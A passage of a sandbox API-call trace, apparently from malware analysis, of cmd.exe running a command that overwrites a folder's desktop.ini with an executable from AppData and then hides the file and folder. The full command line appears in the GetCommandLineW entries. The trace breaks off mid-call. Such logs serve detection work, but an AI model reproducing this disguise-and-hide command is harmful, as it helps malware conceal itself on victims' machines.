0x1c [0134.362] VirtualQuery (in: lpAddress=0xd1000, lpBuffer=0x1cf9a4, dwLength=0x1c | out: lpBuffer=0x1cf9a4*(BaseAddress=0xd1000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0134.362] VirtualQuery (in: lpAddress=0xd3000, lpBuffer=0x1cf9a4, dwLength=0x1c | out: lpBuffer=0x1cf9a4*(BaseAddress=0xd3000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0134.362] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x1cf9a4, dwLength=0x1c | out: lpBuffer=0x1cf9a4*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x40000)) returned 0x1c [0134.362] GetConsoleOutputCP () returned 0x1b5 [0134.362] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0134.362] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0134.362] _get_osfhandle (_FileHandle=1) returned 0x7 [0134.362] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0134.363] _get_osfhandle (_FileHandle=1) returned 0x7 [0134.363] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0134.363] _get_osfhandle (_FileHandle=1) returned 0x7 [0134.363] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0134.363] _get_osfhandle (_FileHandle=0) returned 0x3 [0134.363] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0134.363] _get_osfhandle (_FileHandle=0) returned 0x3 [0134.363] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0134.363] GetEnvironmentStringsW () returned 0x2104d8* [0134.364] FreeEnvironmentStringsW (penv=0x2104d8) returned 1 [0134.364] GetEnvironmentStringsW () returned 0x2104d8* [0134.364] FreeEnvironmentStringsW (penv=0x2104d8) returned 1 [0134.364] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ce944 | out: phkResult=0x1ce944*=0x40) returned 0x0 [0134.364] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ce94c, lpData=0x1ce950, lpcbData=0x1ce948*=0x1000 | out: lpType=0x1ce94c*=0x0, lpData=0x1ce950*=0x88, lpcbData=0x1ce948*=0x1000) returned 0x2 [0134.364] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ce94c, lpData=0x1ce950, lpcbData=0x1ce948*=0x1000 | out: lpType=0x1ce94c*=0x4, lpData=0x1ce950*=0x1, lpcbData=0x1ce948*=0x4) returned 0x0 [0134.364] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ce94c, lpData=0x1ce950, lpcbData=0x1ce948*=0x1000 | out: lpType=0x1ce94c*=0x0, lpData=0x1ce950*=0x1, lpcbData=0x1ce948*=0x1000) returned 0x2 [0134.364] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ce94c, lpData=0x1ce950, lpcbData=0x1ce948*=0x1000 | out: lpType=0x1ce94c*=0x4, lpData=0x1ce950*=0x0, lpcbData=0x1ce948*=0x4) returned 0x0 [0134.364] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ce94c, lpData=0x1ce950, lpcbData=0x1ce948*=0x1000 | out: lpType=0x1ce94c*=0x4, lpData=0x1ce950*=0x40, lpcbData=0x1ce948*=0x4) returned 0x0 [0134.364] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ce94c, lpData=0x1ce950, lpcbData=0x1ce948*=0x1000 | out: lpType=0x1ce94c*=0x4, lpData=0x1ce950*=0x40, lpcbData=0x1ce948*=0x4) returned 0x0 [0134.364] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ce94c, lpData=0x1ce950, lpcbData=0x1ce948*=0x1000 | out: lpType=0x1ce94c*=0x0, lpData=0x1ce950*=0x40, lpcbData=0x1ce948*=0x1000) returned 0x2 [0134.364] RegCloseKey (hKey=0x40) returned 0x0 [0134.364] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ce944 | out: phkResult=0x1ce944*=0x40) returned 0x0 [0134.364] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ce94c, lpData=0x1ce950, lpcbData=0x1ce948*=0x1000 | out: lpType=0x1ce94c*=0x0, lpData=0x1ce950*=0x40, lpcbData=0x1ce948*=0x1000) returned 0x2 [0134.364] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ce94c, lpData=0x1ce950, lpcbData=0x1ce948*=0x1000 | out: lpType=0x1ce94c*=0x4, lpData=0x1ce950*=0x1, lpcbData=0x1ce948*=0x4) returned 0x0 [0134.364] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ce94c, lpData=0x1ce950, lpcbData=0x1ce948*=0x1000 | out: lpType=0x1ce94c*=0x0, lpData=0x1ce950*=0x1, lpcbData=0x1ce948*=0x1000) returned 0x2 [0134.365] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ce94c, lpData=0x1ce950, lpcbData=0x1ce948*=0x1000 | out: lpType=0x1ce94c*=0x4, lpData=0x1ce950*=0x0, lpcbData=0x1ce948*=0x4) returned 0x0 [0134.365] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ce94c, lpData=0x1ce950, lpcbData=0x1ce948*=0x1000 | out: lpType=0x1ce94c*=0x4, lpData=0x1ce950*=0x9, lpcbData=0x1ce948*=0x4) returned 0x0 [0134.365] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ce94c, lpData=0x1ce950, lpcbData=0x1ce948*=0x1000 | out: lpType=0x1ce94c*=0x4, lpData=0x1ce950*=0x9, lpcbData=0x1ce948*=0x4) returned 0x0 [0134.365] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ce94c, lpData=0x1ce950, lpcbData=0x1ce948*=0x1000 | out: lpType=0x1ce94c*=0x0, lpData=0x1ce950*=0x9, lpcbData=0x1ce948*=0x1000) returned 0x2 [0134.365] RegCloseKey (hKey=0x40) returned 0x0 [0134.365] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886368 [0134.365] srand (_Seed=0x5b886368) [0134.365] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\"" [0134.365] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\"" [0134.365] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0134.365] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x211c38, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0134.365] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0134.366] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0134.366] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0134.366] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0134.366] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0134.366] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0134.366] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0134.366] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0134.366] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0134.366] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0134.366] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0134.366] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0134.366] GetEnvironmentStringsW () returned 0x212628* [0134.366] FreeEnvironmentStringsW (penv=0x212628) returned 1 [0134.366] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0134.366] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0134.366] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0134.366] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0134.366] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0134.366] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0134.366] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0134.366] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0134.366] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0134.366] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0134.366] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1cf710 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0134.367] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1cf710, lpFilePart=0x1cf70c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1cf70c*="Desktop") returned 0x18 [0134.367] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0134.367] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1cf48c | out: lpFindFileData=0x1cf48c) returned 0x210cb8 [0134.367] FindClose (in: hFindFile=0x210cb8 | out: hFindFile=0x210cb8) returned 1 [0134.367] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1cf48c | out: lpFindFileData=0x1cf48c) returned 0x210cb8 [0134.367] FindClose (in: hFindFile=0x210cb8 | out: hFindFile=0x210cb8) returned 1 [0134.367] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1cf48c | out: lpFindFileData=0x1cf48c) returned 0x210cb8 [0134.367] FindClose (in: hFindFile=0x210cb8 | out: hFindFile=0x210cb8) returned 1 [0134.367] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0134.367] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0134.367] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0134.368] GetEnvironmentStringsW () returned 0x2104d8* [0134.368] FreeEnvironmentStringsW (penv=0x2104d8) returned 1 [0134.368] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0134.368] GetConsoleOutputCP () returned 0x1b5 [0134.368] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0134.368] GetUserDefaultLCID () returned 0x409 [0134.369] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0134.369] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1cf850, cchData=128 | out: lpLCData="0") returned 2 [0134.369] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1cf850, cchData=128 | out: lpLCData="0") returned 2 [0134.369] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1cf850, cchData=128 | out: lpLCData="1") returned 2 [0134.369] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0134.369] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0134.369] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0134.369] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0134.369] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0134.369] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0134.369] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0134.369] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0134.369] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0134.369] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0134.369] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0134.371] GetConsoleTitleW (in: lpConsoleTitle=0x200af0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0134.371] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0134.371] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0134.371] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0134.371] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0134.372] _wcsicmp (_String1="attrib", _String2=")") returned 56 [0134.372] _wcsicmp (_String1="FOR", _String2="attrib") returned 5 [0134.372] _wcsicmp (_String1="FOR/?", _String2="attrib") returned 5 [0134.372] _wcsicmp (_String1="IF", _String2="attrib") returned 8 [0134.372] _wcsicmp (_String1="IF/?", _String2="attrib") returned 8 [0134.372] _wcsicmp (_String1="REM", _String2="attrib") returned 17 [0134.372] _wcsicmp (_String1="REM/?", _String2="attrib") returned 17 [0134.375] _wcsicmp (_String1="del", _String2=")") returned 59 [0134.375] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0134.375] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0134.375] _wcsicmp (_String1="IF", _String2="del") returned 5 [0134.375] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0134.375] _wcsicmp (_String1="REM", _String2="del") returned 14 [0134.375] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0134.377] _wcsicmp (_String1="type", _String2=")") returned 75 [0134.377] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0134.377] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0134.377] _wcsicmp (_String1="IF", _String2="type") returned -11 [0134.377] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0134.377] _wcsicmp (_String1="REM", _String2="type") returned -2 [0134.377] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0134.430] SetErrorMode (uMode=0x0) returned 0x0 [0134.430] SetErrorMode (uMode=0x1) returned 0x0 [0134.430] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x2104e0, lpFilePart=0x1cf004 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1cf004*="Desktop") returned 0x18 [0134.430] SetErrorMode (uMode=0x0) returned 0x1 [0134.430] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0134.430] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0134.434] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0134.435] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x1ced80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ced80) returned 0xffffffff [0134.435] GetLastError () returned 0x2 [0134.435] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\attrib", fInfoLevelId=0x1, lpFindFileData=0x1ced80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ced80) returned 0xffffffff [0134.435] GetLastError () returned 0x2 [0134.435] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.*", fInfoLevelId=0x1, lpFindFileData=0x1ced80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ced80) returned 0x2125c8 [0134.436] FindClose (in: hFindFile=0x2125c8 | out: hFindFile=0x2125c8) returned 1 [0134.436] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x1ced80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ced80) returned 0xffffffff [0134.436] GetLastError () returned 0x2 [0134.436] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x1ced80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1ced80) returned 0x2125c8 [0134.436] FindClose (in: hFindFile=0x2125c8 | out: hFindFile=0x2125c8) returned 1 [0134.436] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0134.436] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0134.436] GetConsoleTitleW (in: lpConsoleTitle=0x1cf278, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0134.436] InitializeProcThreadAttributeList (in: lpAttributeList=0x1cf100, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1cf1c8 | out: lpAttributeList=0x1cf100, lpSize=0x1cf1c8) returned 1 [0134.436] UpdateProcThreadAttribute (in: lpAttributeList=0x1cf100, dwFlags=0x0, Attribute=0x60001, lpValue=0x1cf1c0, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1cf100, lpPreviousValue=0x0) returned 1 [0134.436] GetStartupInfoW (in: lpStartupInfo=0x1cf0bc | out: lpStartupInfo=0x1cf0bc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0134.436] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0134.437] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib -r -s -h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x1cf15c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib -r -s -h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1cf1a8 | out: lpCommandLine="attrib -r -s -h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\desktop.ini\" ", lpProcessInformation=0x1cf1a8*(hProcess=0x50, hThread=0x4c, dwProcessId=0xc64, dwThreadId=0xc20)) returned 1 [0134.445] CloseHandle (hObject=0x4c) returned 1 [0134.445] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0134.446] GetEnvironmentStringsW () returned 0x210a08* [0134.446] FreeEnvironmentStringsW (penv=0x210a08) returned 1 [0134.446] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0134.528] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x1cf09c | out: lpExitCode=0x1cf09c*=0x0) returned 1 [0134.528] CloseHandle (hObject=0x50) returned 1 [0134.528] _vsnwprintf (in: _Buffer=0x1cf1e4, _BufferCount=0x13, _Format="%08X", _ArgList=0x1cf0a8 | out: _Buffer="00000000") returned 8 [0134.528] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0134.528] GetEnvironmentStringsW () returned 0x212618* [0134.528] FreeEnvironmentStringsW (penv=0x212618) returned 1 [0134.528] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0134.528] GetEnvironmentStringsW () returned 0x212618* [0134.528] FreeEnvironmentStringsW (penv=0x212618) returned 1 [0134.528] DeleteProcThreadAttributeList (in: lpAttributeList=0x1cf100 | out: lpAttributeList=0x1cf100) [0134.528] GetConsoleTitleW (in: lpConsoleTitle=0x1cf480, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0134.529] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x1ce4f8, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x1ce4fc, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x1ce4f8*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0134.529] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0134.529] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0134.529] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0134.529] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\desktop.ini" (normalized: "c:\\users\\eebsym5\\desktop\\gbki\\fttfht~1\\desktop.ini")) returned 0xffffffff [0134.529] GetLastError () returned 0x2 [0134.529] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1" (normalized: "c:\\users\\eebsym5\\desktop\\gbki\\fttfht~1")) returned 0x10 [0134.529] _wcsicmp (_String1="desktop.ini", _String2=".") returned 54 [0134.529] _wcsicmp (_String1="desktop.ini", _String2="..") returned 54 [0134.529] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\desktop.ini" (normalized: "c:\\users\\eebsym5\\desktop\\gbki\\fttfht~1\\desktop.ini")) returned 0xffffffff [0134.530] GetLastError () returned 0x2 [0134.530] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\desktop.ini", fInfoLevelId=0x0, lpFindFileData=0x2136a4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2136a4) returned 0xffffffff [0134.530] GetLastError () returned 0x2 [0134.530] _get_osfhandle (_FileHandle=2) returned 0xb [0134.530] GetFileType (hFile=0xb) returned 0x2 [0134.530] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0134.530] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1ceef8 | out: lpMode=0x1ceef8) returned 1 [0134.530] _get_osfhandle (_FileHandle=2) returned 0xb [0134.530] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x1cef2c | out: lpConsoleScreenBufferInfo=0x1cef2c) returned 1 [0134.530] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x40002712, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Could Not Find %1\r\n") returned 0x13 [0134.531] _get_osfhandle (_FileHandle=1) returned 0x7 [0134.531] _get_osfhandle (_FileHandle=1) returned 0x7 [0134.531] _get_osfhandle (_FileHandle=1) returned 0x7 [0134.531] GetFileType (hFile=0x7) returned 0x2 [0134.531] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0134.531] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1cf61c | out: lpMode=0x1cf61c) returned 1 [0134.531] _dup (_FileHandle=1) returned 3 [0134.531] _close (_FileHandle=1) returned 0 [0134.532] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\desktop.ini", _String2="con") returned -53 [0134.532] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\desktop.ini" (normalized: "c:\\users\\eebsym5\\desktop\\gbki\\fttfht~1\\desktop.ini"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x1cf5ec, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x50 [0134.532] _open_osfhandle (_OSFileHandle=0x50, _Flags=8) returned 1 [0134.532] GetConsoleTitleW (in: lpConsoleTitle=0x1cf41c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0134.532] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe", fInfoLevelId=0x1, lpFindFileData=0x1cef80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cef80) returned 0x20e6a8 [0134.532] _wcsicmp (_String1="XEY8d7zI.exe", _String2=".") returned 74 [0134.532] _wcsicmp (_String1="XEY8d7zI.exe", _String2="..") returned 74 [0134.532] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe")) returned 0x2020 [0134.532] CreateFileW 